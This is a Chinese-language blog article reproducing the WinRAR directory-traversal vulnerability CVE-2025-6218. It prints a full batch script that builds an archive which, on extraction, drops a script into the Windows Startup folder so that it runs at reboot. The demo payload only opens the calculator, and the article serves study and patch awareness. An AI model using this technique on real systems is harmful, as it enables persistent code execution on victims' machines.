登录
首页 >  文章 >  软件教程

CVE-2025-6218WinRAR漏洞复现分析

时间:2025-08-13 21:39:44 364浏览 收藏

WinRAR作为一款流行的压缩文件管理工具,近日被曝存在高危漏洞CVE-2025-6218,该漏洞允许攻击者利用精心构造的压缩包实现目录遍历,将恶意文件释放到任意位置,进而执行恶意代码。本文将详细复现CVE-2025-6218漏洞,针对WinRAR 7.11及更早版本,通过POC工具生成恶意压缩包,并演示如何利用该漏洞将恶意脚本写入启动目录,最终实现系统重启后自动执行恶意代码。该漏洞可能导致严重的安全风险,用户应尽快升级至最新版本以避免潜在威胁。本文旨在帮助安全研究人员和系统管理员深入了解该漏洞的原理和危害,加强安全防护意识。

0x00 前言

WinRAR 是一款功能全面的压缩文件管理工具,作为 RAR 压缩算法在 Windows 系统下的图形化版本,广泛应用于各类文件处理场景。

它不仅可以用于数据备份、减小电子邮件附件体积,还能解压从网络下载的 RAR、ZIP 等多种格式文件,同时支持创建新的 RAR 和 ZIP 格式压缩包。

自 5.60 版本起,WinRAR 更换了全新的图标设计,但官方仍提供主题包供用户选择,可手动恢复为经典界面风格。

0x01 漏洞概述

该漏洞源于 WinRAR 在处理压缩包内文件路径时存在逻辑缺陷,攻击者可通过构造特殊路径实现目录遍历,导致文件被释放到非预期目录,从而在当前用户权限下执行恶意代码。

0x02 CVE 编号

CVE-2025-6218

0x03 影响范围

WinRAR 版本 ≤ 7.11

0x04 漏洞验证过程

1、安装 WinRAR 软件(版本需 ≤ 7.11)

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞图片2、利用公开的 POC 工具生成恶意压缩包

POC 地址:

https://github.com/skimask1690/CVE-2025-6218-POC

批处理脚本内容如下:

@echo offtitle CVE-2025-6218 POCecho calc.exe > POC.bat"C:\Program Files\WinRAR\WinRAR.exe" a -ap" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"  CVE-2025-6218.zip POC.batecho.if errorlevel 1 (    echo [!] Failed to create POC.) else (    echo [+] CVE-2025-6218.zip created successfully!)echo.del POC.batpause

注意事项:

路径中的" \.. \.. \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\"需根据实际批处理文件所在目录调整上级目录数量

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞图片3、通过右键菜单将恶意压缩包解压至指定文件夹,触发路径跳转行为

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞图片4、查看目标启动目录,确认恶意脚本已成功写入

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞图片5、重启系统后,可观察到恶意批处理文件自动执行,弹出计算器

【漏洞复现】CVE-2025-6218|WinRAR目录遍历远程代码执行漏洞图片0x05 参考资料

https://www.zerodayinitiative.com/advisories/ZDI-25-409/

Ps:欢迎关注并分享国内外信息安全动态,转载请保持内容完整。如发现文章中存在敏感或侵权信息,请及时联系作者进行删除。网络安全道路漫长,感谢您的理解与支持!

本文及相关工具仅供学习交流使用,任何因传播或利用文中信息而导致的直接或间接后果,均由使用者自行承担,作者及本平台不承担任何法律责任。

本篇关于《CVE-2025-6218WinRAR漏洞复现分析》的介绍就到此结束啦,但是学无止境,想要了解学习更多关于文章的相关知识,请关注golang学习网公众号!

相关阅读
更多>
最新阅读
更多>
课程推荐
更多>